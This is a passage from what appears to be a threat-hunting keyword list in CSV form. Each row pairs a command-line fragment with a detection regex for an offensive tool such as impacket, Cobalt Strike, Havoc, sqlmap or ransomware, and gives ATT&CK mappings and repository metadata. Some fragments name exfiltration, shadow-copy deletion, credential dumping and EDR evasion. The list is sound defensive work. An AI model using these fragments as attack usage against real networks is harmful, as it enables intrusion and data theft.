TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -d * -t zonewalk*",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2480","525","2024-04-29T05:52:23Z","2010-12-16T03:25:49Z" "* -d * -u * -p * --listener * --target *$DC_HOST*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\s.{0,1000}\s\-\-target\s.{0,1000}\$DC_HOST.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -d * -u *\* -p * --da*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\\.{0,1000}\s\-p\s.{0,1000}\s\-\-da.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* -d *Active Protection DLL for SylantStrike*",".{0,1000}\s\-d\s.{0,1000}Active\sProtection\sDLL\sfor\sSylantStrike.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* -d:sleepmask*",".{0,1000}\s\-d\:sleepmask.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "* daap-get-library.nse*",".{0,1000}\sdaap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dacledit.py*",".{0,1000}\sdacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -daisyserver *",".{0,1000}\s\-daisyserver\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* darkcodersc *",".{0,1000}\sdarkcodersc\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "* darkexe.py*",".{0,1000}\sdarkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "* --DataDirectory * --CookieAuthentication * --DisableNetwork * --hush --SocksPort * -f * --ControlPort * --ControlPortWriteToFile *",".{0,1000}\s\-\-DataDirectory\s.{0,1000}\s\-\-CookieAuthentication\s.{0,1000}\s\-\-DisableNetwork\s.{0,1000}\s\-\-hush\s\-\-SocksPort\s.{0,1000}\s\-f\s.{0,1000}\s\-\-ControlPort\s.{0,1000}\s\-\-ControlPortWriteToFile\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "* daytime.nse*",".{0,1000}\sdaytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* db2-das-info.nse*",".{0,1000}\sdb2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --dbms=mysql -u *",".{0,1000}\s\-\-dbms\=mysql\s\-u\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --dc * -m custom --filter *objectCategory*",".{0,1000}\s\-\-dc\s.{0,1000}\s\-m\scustom\s\-\-filter\s.{0,1000}objectCategory.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -dc-host * -spn * -impersonate *",".{0,1000}\s\-dc\-host\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "* -dc-ip * -so *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\s\-so\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -dc-ip * -computer-pass *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -dc-ip * -dump *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -dc-ip * -impersonate *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --dc-ip * -request * -format hashcat*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-request\s.{0,1000}\s\-format\shashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "* -dc-ip * -target-ip *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --dc-ip * --vuln --enabled*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-vuln\s\-\-enabled.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -dc-ip *SAMDump*",".{0,1000}\s\-dc\-ip\s.{0,1000}SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* dcow.c *",".{0,1000}\sdcow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "* dcow.cpp*",".{0,1000}\sdcow\.cpp.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","4","307","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" "* -DDONUT_EXE *",".{0,1000}\s\-DDONUT_EXE\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* ddspoof.py*",".{0,1000}\sddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "* deadPool.ps1*",".{0,1000}\sdeadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* --deauth * -a TR:GT:AP:BS:SS:ID wlan*",".{0,1000}\s\-\-deauth\s.{0,1000}\s\-a\sTR\:GT\:AP\:BS\:SS\:ID\swlan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --debug --exfil --onedrive*",".{0,1000}\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* decrypt *.aes.zip*",".{0,1000}\sdecrypt\s.{0,1000}\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* deepce.sh *--install*",".{0,1000}\sdeepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* default_logins.txt*",".{0,1000}\sdefault_logins\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "* Defense_Evasion.sh*",".{0,1000}\sDefense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* DelegationBOF.c *",".{0,1000}\sDelegationBOF\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delegationx64.o*",".{0,1000}\sdelegationx64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delegationx86.o*",".{0,1000}\sdelegationx86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delete shadow copies from *c:/ *",".{0,1000}\sdelete\sshadow\scopies\sfrom\s.{0,1000}c\:\/\s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "* deluge-rpc-brute.nse*",".{0,1000}\sdeluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dementor.py*",".{0,1000}\sdementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* demiguise.py*",".{0,1000}\sdemiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* demon.x64.exe*",".{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "* Dendron.exe*",".{0,1000}\sDendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "* deploy_cobalt_beacon*",".{0,1000}\sdeploy_cobalt_beacon.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "* DesertFox.go",".{0,1000}\sDesertFox\.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "* -DestHost * -DestPort 5555 -UseDefaultProxy*",".{0,1000}\s\-DestHost\s.{0,1000}\s\-DestPort\s5555\s\-UseDefaultProxy.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "* detect-hooks.c *",".{0,1000}\sdetect\-hooks\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "* 